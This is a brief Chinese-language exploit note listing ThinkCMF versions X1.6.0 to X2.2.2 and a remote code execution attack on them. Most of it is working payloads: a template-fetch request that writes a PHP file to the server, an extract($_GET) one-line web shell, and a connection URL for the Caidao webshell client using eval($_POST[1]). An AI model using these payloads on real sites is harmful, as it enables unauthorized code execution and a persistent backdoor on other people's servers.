影响版本
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
利用
/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
<?extract($_GET).$a($b[0]);?>
测试:arr.php?a=assert&b[0]=phpinfo();
菜刀接法:arr.php?a=assert&b[0]=eval($_POST[1]);
本文作者为lufei,转载请注明。
